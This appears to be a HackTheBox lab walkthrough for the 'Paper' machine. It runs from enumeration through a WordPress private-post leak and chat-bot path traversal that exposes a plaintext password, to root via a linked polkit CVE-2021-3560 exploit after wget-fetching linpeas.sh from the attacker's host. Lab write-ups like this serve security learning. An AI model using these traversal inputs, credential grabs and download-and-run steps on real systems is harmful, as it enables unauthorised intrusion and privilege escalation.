HackTheBox — Paper (w/o Metasploit)
Paper was an interesting machine from the beginning. While it’s marked as easy, it definitely takes some thinking as you’ll face some uncommon steps to get to where you’re going.
Enumeration
Let’s start by scanning with nmap by using the following command:
nmap -n -sC -sV -p- 10.10.11.143We see three ports open based on the response — 22 (ssh), 80 (http), and 443 (https).
Let’s try visiting the url by going to http://10.10.11.143.
Again, there isn’t much to see here. Let’s see if we can gather some data using the following curl command:
curl -I 10.10.11.143The capital i will only return the headers without the content of the page.
One thing stands out in this response — the X-Backend-Server header. This looks like a URL that we can visit, so let’s add that to our /etc/hosts file by typing
sudo nano /etc/hostsand entering the following line to the bottom of your file.
Now let’s try going to http://office.paper. Now we’re seeing something different!
It’s always a good habit to read through the page and gather as much data as you can. Sometimes you can find some important info in the details. For example, scrolling all the way to the bottom of the page shows that the site was made using Wordpress.
We can use an open source Wordpress vulnerability scanner called wpscan to get some more details about this installation. Maybe there’s a vulnerable version, plugin, or theme that we can exploit. To scan the site using wpscan, run the following command:
wpscan --url office.paper
According to wpscan, this installation is out of date. The site is running Wordpress version 5.2.3. If we go to www.exploit-db.com and search “Wordpress 5.2.3”, we find a vulnerability named “WordPress Core < 5.2.3 — Viewing Unauthenticated/Password/Private Posts”. According to this vulnerability, we can view “secret content” by adding ?static=1 to the URL.
We can test this out by visiting http://office.paper/?static=1
It works! It looks like this vulnerability reveals private posts, which in our case is great because there appears to be a secret registration URL for the new employee chat system on that private post. Before we can go there though, we’ll need to add that URL to the /etc/hosts file as well. Again, use the following command:
sudo nano /etc/hostsand add chat.office.paper to the previous entry.
Now, let’s try copying and pasting that secret chat URL. This will take you to a registration page for rocket chat. You don’t need to use a valid email here. In my case, I just used test@test.test.
After joining and waiting for a minute or two, the chat content should appear. There appears to be a conversation going on about a bot that was setup by DwightKSchrute. Again, don’t skip out on the details.
According to the conversation, you can call the bot by saying its name. Except there’s one problem… the room is read only. Is there another way to talk to the bot?
If you hover over the bot’s name, there appears to be a direct message option.
According to the chat, you can get a list of commands by typing recyclops help.
It looks like we have a lot to play with here.
Exploiting Recyclops
If you look through the commands, you should see two that look interesting — Files and List. Files allows you retrieve files, and List allows you see which files are available.
So what happens if we try recyclops list ../?
This shows us files in the previous directory. Looking through these files, bot_restart.sh looks like an interesting one. Let’s take a look at that one. To retrieve the file, type recyclops file ../bot_reestart.sh.
That line bash /home/dwight/hubot/start_bot.sh& reveals two things. First, we have a username (dwight). Second, we have another interesting .sh file to look for. To read that file next, let’s type
recyclops file ../hubot/start_bot.sh
The line source /home/dwight/hubot/.env looks interesting, as source reads and executes the content of a file. Let’s see what /home/dwight/hubot/.env contains.
We have a password — Queensofblad3s!23
Looking back on our nmap scan from earlier, we saw that port 22 was open. Can we ssh as recyclops using this password?
Unfortunately not. We did see the username “dwight” though. How about that?
Success! We’re in. Don’t forget to grab the user.txt flag at this point.
Privilege Escalation
We can do some manual enumeration at this point, but the quickest way to knock out the basics would be to use LinPEAS. LinPEAS (Linux Privilege Escalation Awesome Script) is a script that automatically searches for possible paths to escalate privileges on, and returns its findings in an easy to read report.
To start, first download it from the LinPEAS Github repo here: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Once you have it, go ahead and start a web server to transfer it onto the target machine by running this command locally, and from the same directory that contains the linpeas.sh file:
python3 -m http.server 8000Now go back to the Paper server that you’re ssh’ed into and use wget to retrieve the file. Don’t forget, the server is running on port 8000, so use the following command:
wget http://your-ip-address:8000/linpeas.shNext, you’ll need make the file executable, which you can do by typing the following:
chmod +x linpeas.shAnd finally, type ./linpeas.sh > linpeas.txt
Once it’s finished, if the system is vulnerable to any known exploits, it will be marked with the words “Vulnerable”. We can quickly look for this by using the following grep command:
grep 'Vulnerable' linpeas.txt
The server appears to be vulnerable to CVE-2021–3560. This is a vulnerability in polkit (the system service that’s running in the background whenever you see a dialog box in Linux) that allows an unprivileged local user to get a root shell on the system. We happen to be an unprivileged local user. We happen to want to get a root shell on the system.
I looked around for a poc of this exploit by googling “CVE-2021–3560 github”. After testing a few, this one seemed to work best: https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
To use it, download the python file and again transfer it using the same wget method as we used for LinPEAS.
I had to run this python file twice after the first round because the password failed. But after running it multiple times…
…it worked just fine :)
Grab the root.txt file and enjoy your victory.
Final Thoughts
I always like boxes that require me to dig and think, even if the privilege escalation portion takes two steps. Boxes like these, although easy, are surprisingly realistic. I’m not saying someone is going to have everything laid out for you. But security incidents do often come as the result of out-of-date/unpatched systems and poor security practices like plaintext passwords. This machine was entirely that, from beginning to end. I hope you enjoyed this write up of Paper.
